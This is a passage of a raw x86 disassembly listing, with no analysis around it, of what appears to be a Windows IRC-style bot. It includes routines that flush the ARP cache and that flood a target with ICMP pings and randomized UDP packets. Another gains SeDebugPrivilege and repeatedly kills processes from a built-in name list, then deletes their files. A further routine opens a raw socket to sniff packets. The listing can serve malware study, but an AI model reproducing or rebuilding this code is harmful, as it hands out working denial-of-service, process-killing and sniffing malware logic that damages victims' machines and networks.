jmp ecx
; ---------------------------------------------------------------------------
locret_408773: ; CODE XREF: sub_408765+A�j
retn
sub_408765 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_408774 proc near ; CODE XREF: sub_409806:loc_40E401�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 88h
push ebx
push esi
xor eax, eax
push edi
inc eax
push eax
mov [ebp+78h+var_4], eax
lea eax, [ebp+78h+var_8]
xor ebx, ebx
push eax
push ebx
xor esi, esi
mov [ebp+78h+var_8], ebx
call dword_43A3A8 ; GetIpNetTable
mov ecx, eax
sub ecx, ebx
jz short loc_408804
sub ecx, 32h
jz loc_40884B
sub ecx, 48h
jz short loc_4087CF
sub ecx, 6Eh
jz short loc_4087C8
loc_4087B4: ; CODE XREF: sub_408774+8E�j
push eax
lea eax, [ebp+78h+var_88]
push offset aFlushdnsErrorG ; "[FLUSHDNS]: Error getting ARP cache: <%"...
push eax
call sub_416905
add esp, 0Ch
jmp short loc_40882C
; ---------------------------------------------------------------------------
loc_4087C8: ; CODE XREF: sub_408774+3E�j
push offset aFlushdnsArpCac ; "[FLUSHDNS]: ARP cache is empty."
jmp short loc_408821
; ---------------------------------------------------------------------------
loc_4087CF: ; CODE XREF: sub_408774+39�j
push [ebp+78h+var_8]
call sub_416DAF
pop ecx
mov ecx, [ebp+78h+var_8]
mov edx, ecx
mov esi, eax
shr ecx, 2
xor eax, eax
mov edi, esi
rep stosd
mov ecx, edx
and ecx, 3
cmp esi, ebx
rep stosb
jz short loc_40881C
push 1
lea eax, [ebp+78h+var_8]
push eax
push esi
call dword_43A3A8 ; GetIpNetTable
cmp eax, ebx
jnz short loc_4087B4
loc_408804: ; CODE XREF: sub_408774+2B�j
cmp [esi], ebx
jbe short loc_408839
lea edi, [esi+4]
loc_40880B: ; CODE XREF: sub_408774+A4�j
push edi
call dword_43A40C ; DeleteIpNetEntry
inc ebx
add edi, 18h
cmp ebx, [esi]
jb short loc_40880B
jmp short loc_408839
; ---------------------------------------------------------------------------
loc_40881C: ; CODE XREF: sub_408774+7D�j
push offset aFlushdnsUnable ; "[FLUSHDNS]: Unable to allocation ARP ca"...
loc_408821: ; CODE XREF: sub_408774+59�j
; sub_408774+DC�j
lea eax, [ebp+78h+var_88]
push eax
call sub_416905
pop ecx
pop ecx
loc_40882C: ; CODE XREF: sub_408774+52�j
lea eax, [ebp+78h+var_88]
push eax
mov [ebp+78h+var_4], ebx
call sub_401ECD
pop ecx
loc_408839: ; CODE XREF: sub_408774+92�j
; sub_408774+A6�j
push esi
call sub_416C97
mov eax, [ebp+78h+var_4]
pop ecx
pop edi
pop esi
pop ebx
add ebp, 78h
leave
retn
; ---------------------------------------------------------------------------
loc_40884B: ; CODE XREF: sub_408774+30�j
push offset aFlushdnsNotSup ; "[FLUSHDNS]: Not supported by this syste"...
jmp short loc_408821
sub_408774 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408852 proc near ; CODE XREF: sub_401141+313�p
; sub_40598C+18E�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
mov [ebp+var_4], 10h
call dword_43A308 ; getsockname
movzx eax, [ebp+var_D]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
mov esi, offset dword_43B030
push esi
call sub_416905
add esp, 18h
pop edi
mov eax, esi
pop esi
leave
retn
sub_408852 endp
; =============== S U B R O U T I N E =======================================
sub_4088A8 proc near ; CODE XREF: sub_402816+249�p
; sub_402816+274�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
xor edx, edx
cmp ecx, 1
push esi
jle short loc_4088D3
lea eax, [ecx-2]
shr eax, 1
inc eax
mov esi, eax
neg esi
lea ecx, [ecx+esi*2]
mov esi, [esp+4+arg_0]
push edi
loc_4088C6: ; CODE XREF: sub_4088A8+26�j
movzx edi, word ptr [esi]
add edx, edi
inc esi
inc esi
dec eax
jnz short loc_4088C6
pop edi
jmp short loc_4088D7
; ---------------------------------------------------------------------------
loc_4088D3: ; CODE XREF: sub_4088A8+A�j
mov esi, [esp+4+arg_0]
loc_4088D7: ; CODE XREF: sub_4088A8+29�j
test ecx, ecx
jz short loc_4088E0
movzx eax, byte ptr [esi]
add edx, eax
loc_4088E0: ; CODE XREF: sub_4088A8+31�j
mov ecx, edx
shr ecx, 10h
and edx, 0FFFFh
add ecx, edx
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
pop esi
retn
sub_4088A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088F8 proc near ; DATA XREF: sub_409806+5AC2�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_416B20
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
pop ecx
mov esi, eax
xor ebx, ebx
lea edi, [ebp+var_144]
rep movsd
inc ebx
mov [eax+120h], ebx
call dword_43A3F0 ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call dword_43A414 ; inet_addr
mov esi, eax
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_408951
lea eax, [ebp+var_C0]
push eax
call dword_43A400 ; gethostbyname
test eax, eax
jz short loc_408957
loc_408951: ; CODE XREF: sub_4088F8+46�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_4089B5
loc_408957: ; CODE XREF: sub_4088F8+57�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingErrorSendi ; "[PING]: Error sending pings to %s."
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+var_28], 0
jnz short loc_408999
push 0
push [ebp+var_2C]
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_405D20
add esp, 14h
loc_408999: ; CODE XREF: sub_4088F8+7E�j
lea eax, [ebp+var_344]
push eax
call sub_401ECD
push [ebp+var_30]
call sub_41397A
pop ecx
pop ecx
push ebx
jmp loc_408A7A
; ---------------------------------------------------------------------------
loc_4089B5: ; CODE XREF: sub_4088F8+5D�j
test eax, eax
jz short loc_4089C5
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_4089C8
; ---------------------------------------------------------------------------
loc_4089C5: ; CODE XREF: sub_4088F8+BF�j
mov [ebp+var_4], esi
loc_4089C8: ; CODE XREF: sub_4088F8+CB�j
push 7
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
cmp [ebp+var_3C], eax
jle short loc_4089E3
mov [ebp+var_3C], eax
loc_4089E3: ; CODE XREF: sub_4088F8+E6�j
cmp [ebp+var_38], ebx
jge short loc_4089EB
mov [ebp+var_38], ebx
loc_4089EB: ; CODE XREF: sub_4088F8+EE�j
xor edi, edi
xor esi, esi
cmp [ebp+var_40], edi
jle short loc_408A1A
loc_4089F4: ; CODE XREF: sub_4088F8+120�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push edi
push [ebp+var_3C]
lea eax, [ebp+var_10320]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call dword_43A48C ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_4089F4
loc_408A1A: ; CODE XREF: sub_4088F8+FA�j
push [ebp+arg_0]
call dword_43A424 ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingFinishedSe ; "[PING]: Finished sending pings to %s."
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+var_28], edi
jnz short loc_408A63
push edi
push [ebp+var_2C]
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_405D20
add esp, 14h
loc_408A63: ; CODE XREF: sub_4088F8+149�j
lea eax, [ebp+var_344]
push eax
call sub_401ECD
push [ebp+var_30]
call sub_41397A
pop ecx
pop ecx
push edi
loc_408A7A: ; CODE XREF: sub_4088F8+B8�j
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_4088F8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408A81 proc near ; DATA XREF: sub_409806+5C12�o
var_10316 = byte ptr -10316h
var_10314 = byte ptr -10314h
var_338 = byte ptr -338h
var_138 = dword ptr -138h
var_134 = byte ptr -134h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10314h
call sub_416B20
mov eax, [ebp+arg_0]
push esi
push edi
push 49h
pop ecx
mov esi, eax
lea edi, [ebp+var_138]
rep movsd
xor esi, esi
inc esi
mov [eax+120h], esi
call dword_42201C ; GetTickCount
push eax
call sub_41698D
pop ecx
push 11h
push 2
push 2
call dword_43A39C ; socket
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+var_B4]
push eax
mov [ebp+var_14], 2
call dword_43A414 ; inet_addr
xor edi, edi
xor ecx, ecx
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_408B5C
lea eax, [ebp+var_B4]
push eax
call dword_43A400 ; gethostbyname
mov ecx, eax
cmp ecx, edi
jnz short loc_408B5C
lea eax, [ebp+var_B4]
push eax
lea eax, [ebp+var_338]
push offset aUdpErrorSendin ; "[UDP]: Error sending pings to %s."
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+var_1C], edi
jnz short loc_408B40
push edi
push [ebp+var_20]
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+var_138]
call sub_405D20
add esp, 14h
loc_408B40: ; CODE XREF: sub_408A81+9D�j
lea eax, [ebp+var_338]
push eax
call sub_401ECD
push [ebp+var_24]
call sub_41397A
pop ecx
pop ecx
push esi
jmp loc_408C95
; ---------------------------------------------------------------------------
loc_408B5C: ; CODE XREF: sub_408A81+6A�j
; sub_408A81+7D�j
cmp [ebp+var_28], edi
jge short loc_408B64
mov [ebp+var_28], edi
loc_408B64: ; CODE XREF: sub_408A81+DE�j
mov eax, 0FFFFh
cmp [ebp+var_28], eax
jle short loc_408B71
mov [ebp+var_28], eax
loc_408B71: ; CODE XREF: sub_408A81+EB�j
cmp ecx, edi
jz short loc_408B7C
mov eax, [ecx+0Ch]
mov eax, [eax]
jmp short loc_408B7F
; ---------------------------------------------------------------------------
loc_408B7C: ; CODE XREF: sub_408A81+F2�j
lea eax, [ebp+arg_0]
loc_408B7F: ; CODE XREF: sub_408A81+F9�j
cmp [ebp+var_28], edi
mov eax, [eax]
mov [ebp+var_10], eax
jnz short loc_408B9A
call sub_41699A
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_408B9D
; ---------------------------------------------------------------------------
loc_408B9A: ; CODE XREF: sub_408A81+106�j
push [ebp+var_28]
loc_408B9D: ; CODE XREF: sub_408A81+117�j
call dword_43A4F4 ; ntohs
mov [ebp+var_12], ax
mov eax, [ebp+var_34]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_2C], edi
mov [ebp+var_34], eax
jnz short loc_408BBB
mov [ebp+var_2C], esi
loc_408BBB: ; CODE XREF: sub_408A81+135�j
xor esi, esi
cmp [ebp+var_30], edi
jle short loc_408C36
loc_408BC2: ; CODE XREF: sub_408A81+159�j
call sub_41699A
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_30]
mov [ebp+esi-10315h], dl
jl short loc_408BC2
jmp short loc_408C36
; ---------------------------------------------------------------------------
loc_408BDE: ; CODE XREF: sub_408A81+1B8�j
dec [ebp+var_34]
push 0Bh
pop esi
loc_408BE4: ; CODE XREF: sub_408A81+195�j
push 10h
lea eax, [ebp+var_14]
push eax
push edi
call sub_41699A
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_30]
sub eax, edx
push eax
lea eax, [ebp+var_10314]
push eax
push [ebp+var_4]
call dword_43A36C ; sendto
push [ebp+var_2C]
call dword_422000 ; Sleep
dec esi
jnz short loc_408BE4
cmp [ebp+var_28], edi
jnz short loc_408C36
call sub_41699A
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_43A4F4 ; ntohs
mov [ebp+var_12], ax
loc_408C36: ; CODE XREF: sub_408A81+13F�j
; sub_408A81+15B�j ...
cmp [ebp+var_34], edi
jg short loc_408BDE
dec [ebp+var_34]
lea eax, [ebp+var_B4]
push eax
lea eax, [ebp+var_338]
push offset aUdpFinishedSen ; "[UDP]: Finished sending packets to %s."
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+var_1C], edi
jnz short loc_408C7E
push edi
push [ebp+var_20]
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+var_138]
call sub_405D20
add esp, 14h
loc_408C7E: ; CODE XREF: sub_408A81+1DB�j
lea eax, [ebp+var_338]
push eax
call sub_401ECD
push [ebp+var_24]
call sub_41397A
pop ecx
pop ecx
push edi
loc_408C95: ; CODE XREF: sub_408A81+D6�j
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_408A81 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408C9C proc near ; CODE XREF: sub_403DEF+45�p
; sub_403DEF+165�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call dword_4220E0 ; GetCurrentProcess
push eax
call dword_43A4DC ; OpenProcessToken
test eax, eax
jnz short loc_408CBB
leave
retn
; ---------------------------------------------------------------------------
loc_408CBB: ; CODE XREF: sub_408C9C+1B�j
push esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
xor esi, esi
push esi
call dword_43A4C0 ; LookupPrivilegeValueA
test eax, eax
jz short loc_408CF9
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_408CE2
or [ebp+var_8], 2
jmp short loc_408CE6
; ---------------------------------------------------------------------------
loc_408CE2: ; CODE XREF: sub_408C9C+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_408CE6: ; CODE XREF: sub_408C9C+44�j
push esi
push esi
push esi
lea eax, [ebp+var_14]
push eax
push esi
push [ebp+var_4]
call dword_43A408 ; AdjustTokenPrivileges
mov esi, eax
loc_408CF9: ; CODE XREF: sub_408C9C+32�j
push [ebp+var_4]
call dword_42202C ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_408C9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408D07 proc near ; CODE XREF: sub_40901A+68�p
; sub_40911C+C�p ...
var_550 = byte ptr -550h
var_350 = dword ptr -350h
var_34C = byte ptr -34Ch
var_230 = byte ptr -230h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_124 = dword ptr -124h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 550h
push ebx
push esi
push edi
xor ebx, ebx
push 49h
xor eax, eax
cmp dword_43A38C, ebx
pop ecx
lea edi, [ebp+var_128]
mov [ebp+var_12C], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_34C]
mov [ebp+var_350], ebx
rep stosd
jz loc_408F18
cmp dword_43A3EC, ebx
jz loc_408F18
cmp dword_43A344, ebx
jz loc_408F18
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_408C9C
pop ecx
pop ecx
push ebx
push 0Fh
call dword_43A38C ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_408F0B
lea eax, [ebp+var_12C]
push eax
push edi
mov [ebp+var_12C], 128h
call dword_43A3EC ; Process32First
test eax, eax
mov esi, dword_42202C
jz loc_408F06
lea eax, [ebp+var_12C]
push eax
push edi
call dword_43A344 ; Process32Next
test eax, eax
jz loc_408F06
mov ebx, dword_422078
loc_408DC6: ; CODE XREF: sub_408D07+1F7�j
cmp [ebp+arg_10], 0
jz short loc_408E27
xor edi, edi
loc_408DCE: ; CODE XREF: sub_408D07+E7�j
push off_42ED68[edi]
lea eax, [ebp+var_108]
push eax
call dword_4220EC ; lstrcmpiA
test eax, eax
jz short loc_408DF5
add edi, 4
cmp edi, 9E0h
jb short loc_408DCE
jmp loc_408EEC
; ---------------------------------------------------------------------------
loc_408DF5: ; CODE XREF: sub_408D07+DC�j
push [ebp+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
mov edi, eax
test edi, edi
jz loc_408EEC
push 0
push edi
call dword_4220E8 ; TerminateProcess
test eax, eax
jnz loc_408EEC
loc_408E1F: ; CODE XREF: sub_408D07+1AF�j
push edi
call esi ; CloseHandle
jmp loc_408EEC
; ---------------------------------------------------------------------------
loc_408E27: ; CODE XREF: sub_408D07+C3�j
mov edi, [ebp+arg_C]
test edi, edi
jnz loc_408EBB
cmp [ebp+arg_4], edi
jz loc_408EEC
push [ebp+var_124]
push 8
call dword_43A38C ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov edi, eax
mov [ebp+var_350], 224h
jz short loc_408E7B
lea eax, [ebp+var_350]
push eax
push edi
call dword_43A3B4 ; Module32First
test eax, eax
push [ebp+var_124]
jz short loc_408E81
lea eax, [ebp+var_230]
jmp short loc_408E87
; ---------------------------------------------------------------------------
loc_408E7B: ; CODE XREF: sub_408D07+152�j
push [ebp+var_124]
loc_408E81: ; CODE XREF: sub_408D07+16A�j
lea eax, [ebp+var_108]
loc_408E87: ; CODE XREF: sub_408D07+172�j
push eax
lea eax, [ebp+var_550]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_416905
add esp, 10h
push 1
push [ebp+arg_8]
lea eax, [ebp+var_550]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
jmp loc_408E1F
; ---------------------------------------------------------------------------
loc_408EBB: ; CODE XREF: sub_408D07+125�j
lea eax, [ebp+var_108]
loc_408EC1: ; CODE XREF: sub_408D07+1D6�j
mov dl, [eax]
mov cl, dl
cmp dl, [edi]
jnz short loc_408EE3
test cl, cl
jz short loc_408EDF
mov dl, [eax+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_408EE3
inc eax
inc eax
inc edi
inc edi
test cl, cl
jnz short loc_408EC1
loc_408EDF: ; CODE XREF: sub_408D07+1C4�j
xor eax, eax
jmp short loc_408EE8
; ---------------------------------------------------------------------------
loc_408EE3: ; CODE XREF: sub_408D07+1C0�j
; sub_408D07+1CE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_408EE8: ; CODE XREF: sub_408D07+1DA�j
test eax, eax
jz short loc_408F1F
loc_408EEC: ; CODE XREF: sub_408D07+E9�j
; sub_408D07+101�j ...
lea eax, [ebp+var_12C]
push eax
push [ebp+var_4]
call dword_43A344 ; Process32Next
test eax, eax
jnz loc_408DC6
xor ebx, ebx
loc_408F06: ; CODE XREF: sub_408D07+9D�j
; sub_408D07+B3�j
push [ebp+var_4]
call esi ; CloseHandle
loc_408F0B: ; CODE XREF: sub_408D07+77�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_408C9C
pop ecx
pop ecx
loc_408F18: ; CODE XREF: sub_408D07+3A�j
; sub_408D07+46�j ...
xor eax, eax
loc_408F1A: ; CODE XREF: sub_408D07+30E�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_408F1F: ; CODE XREF: sub_408D07+1E3�j
push [ebp+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
push [ebp+var_124]
mov edi, eax
push 8
call dword_43A38C ; CreateToolhelp32Snapshot
push [ebp+var_4]
mov ebx, eax
mov [ebp+var_350], 224h
call esi ; CloseHandle
push 0
push edi
call dword_4220E8 ; TerminateProcess
test eax, eax
jnz short loc_408F64
push edi
call esi ; CloseHandle
push ebx
call esi ; CloseHandle
jmp short loc_408F18
; ---------------------------------------------------------------------------
loc_408F64: ; CODE XREF: sub_408D07+253�j
cmp [ebp+arg_18], 0
jz loc_409012
lea eax, [ebp+var_350]
push eax
push ebx
call dword_43A3B4 ; Module32First
test eax, eax
jz short loc_408FD7
push ebx
call esi ; CloseHandle
xor esi, esi
loc_408F85: ; CODE XREF: sub_408D07+2B2�j
push 7D0h
call dword_422000 ; Sleep
push 20h
lea eax, [ebp+var_230]
push eax
inc esi
call dword_4220CC ; SetFileAttributesA
lea eax, [ebp+var_230]
push eax
call dword_4220E4 ; DeleteFileA
test eax, eax
setnz al
test al, al
jnz short loc_408FC9
cmp esi, 5
jl short loc_408F85
lea eax, [ebp+var_230]
push eax
push offset aCouldNotDelete ; "Could not delete '%s'.!\n"
jmp short loc_408FE3
; ---------------------------------------------------------------------------
loc_408FC9: ; CODE XREF: sub_408D07+2AD�j
lea eax, [ebp+var_230]
push eax
push offset aFileDeletedS_ ; "[FILE]: Deleted '%s'.\n"
jmp short loc_408FE3
; ---------------------------------------------------------------------------
loc_408FD7: ; CODE XREF: sub_408D07+277�j
lea eax, [ebp+var_108]
push eax
push offset aCannotExtractP ; "Cannot extract process path for %s\n"
loc_408FE3: ; CODE XREF: sub_408D07+2C0�j
; sub_408D07+2CE�j
lea eax, [ebp+var_550]
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_409012
push 1
push [ebp+arg_8]
lea eax, [ebp+var_550]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
loc_409012: ; CODE XREF: sub_408D07+261�j
; sub_408D07+2EF�j
xor eax, eax
inc eax
jmp loc_408F1A
sub_408D07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40901A proc near ; DATA XREF: sub_409806+4E34�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 298h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+74h+var_298]
push offset aProcListingPro ; "[PROC]: Listing processes:"
push eax
call sub_416905
xor esi, esi
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_409072
push esi
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_298]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_405D20
add esp, 14h
loc_409072: ; CODE XREF: sub_40901A+3C�j
push esi
push [ebp+74h+var_10]
lea eax, [ebp+74h+var_94]
push esi
push esi
push [ebp+74h+var_C]
push eax
push [ebp+74h+var_98]
call sub_408D07
add esp, 1Ch
test eax, eax
lea eax, [ebp+74h+var_298]
jnz short loc_40909B
push offset aProcProcessLis ; "[PROC]: Process list completed."
jmp short loc_4090A0
; ---------------------------------------------------------------------------
loc_40909B: ; CODE XREF: sub_40901A+78�j
push offset aProcProcessL_0 ; "[PROC]: Process list failed."
loc_4090A0: ; CODE XREF: sub_40901A+7F�j
push eax
call sub_416905
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_4090C7
push esi
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_298]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_405D20
add esp, 14h
loc_4090C7: ; CODE XREF: sub_40901A+91�j
lea eax, [ebp+74h+var_298]
push eax
call sub_401ECD
push [ebp+74h+var_14]
call sub_41397A
pop ecx
pop ecx
push esi
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_40901A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4090E5 proc near ; CODE XREF: sub_409806+3F9D�p
; sub_41379F+4D�p
arg_0 = dword ptr 4
push esi
push edi
push [esp+8+arg_0]
xor edi, edi
push 0
push 1F0FFFh
inc edi
call dword_422078 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_409117
push 0
push esi
call dword_4220E8 ; TerminateProcess
test eax, eax
jnz short loc_409117
push esi
xor edi, edi
call dword_42202C ; CloseHandle
loc_409117: ; CODE XREF: sub_4090E5+1A�j
; sub_4090E5+27�j
mov eax, edi
pop edi
pop esi
retn
sub_4090E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40911C proc near ; DATA XREF: sub_409806+21F6�o
push esi
xor esi, esi
loc_40911F: ; CODE XREF: sub_40911C+20�j
push esi
push 1
push 1
push esi
push esi
push esi
push esi
call sub_408D07
add esp, 1Ch
push dword_42ED60
call dword_422000 ; Sleep
jmp short loc_40911F
sub_40911C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40913E proc near ; DATA XREF: sub_409806+1C6A�o
var_102B4 = byte ptr -102B4h
var_102AC = byte ptr -102ACh
var_102A8 = dword ptr -102A8h
var_102A0 = dword ptr -102A0h
var_10293 = byte ptr -10293h
var_1028C = byte ptr -1028Ch
var_2B4 = byte ptr -2B4h
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov eax, 102B4h
lea ebp, [esp-74h]
call sub_416B20
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
xor eax, eax
inc eax
push 25h
pop ecx
mov [ebp+74h+var_8], eax
mov esi, edx
lea edi, [ebp+74h+var_B4]
rep movsd
mov [edx+90h], eax
xor eax, eax
lea edi, [ebp+74h+var_1C]
stosd
stosd
stosd
xor esi, esi
stosd
push esi
mov [ebp+74h+var_1C], 2
call dword_43A4F4 ; ntohs
push [ebp+74h+var_B4]
mov [ebp+74h+var_1A], ax
call sub_408852
pop ecx
push eax
call dword_43A414 ; inet_addr
push esi
push 3
push 2
mov [ebp+74h+var_18], eax
call dword_43A39C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+74h+var_4], edi
jnz short loc_409201
call dword_43A45C ; WSAGetLastError
push eax
lea eax, [ebp+74h+var_2B4]
push offset aPsniffErrorSoc ; "[PSNIFF]: Error: socket() failed, retur"...
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+74h+var_28], esi
jnz short loc_4091E7
push esi
push [ebp+74h+var_2C]
lea eax, [ebp+74h+var_2B4]
push eax
lea eax, [ebp+74h+var_B0]
push eax
push [ebp+74h+var_B4]
call sub_405D20
add esp, 14h
loc_4091E7: ; CODE XREF: sub_40913E+8D�j
lea eax, [ebp+74h+var_2B4]
push eax
call sub_401ECD
push [ebp+74h+var_30]
call sub_41397A
pop ecx
jmp loc_409422
; ---------------------------------------------------------------------------
loc_409201: ; CODE XREF: sub_40913E+6D�j
mov eax, [ebp+74h+var_30]
imul eax, 234h
mov dword_43B24C[eax], edi
push 10h
lea eax, [ebp+74h+var_1C]
push eax
push edi
call dword_43A47C ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_40926F
call dword_43A45C ; WSAGetLastError
push eax
lea eax, [ebp+74h+var_2B4]
push offset aPsniffErrorBin ; "[PSNIFF]: Error: bind() failed, returne"...
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+74h+var_28], esi
jnz short loc_40925C
loc_409242: ; CODE XREF: sub_40913E+170�j
push esi
push [ebp+74h+var_2C]
lea eax, [ebp+74h+var_2B4]
push eax
lea eax, [ebp+74h+var_B0]
push eax
push [ebp+74h+var_B4]
call sub_405D20
add esp, 14h
loc_40925C: ; CODE XREF: sub_40913E+102�j
; sub_40913E+16E�j
lea eax, [ebp+74h+var_2B4]
push eax
call sub_401ECD
pop ecx
push edi
jmp loc_409414
; ---------------------------------------------------------------------------
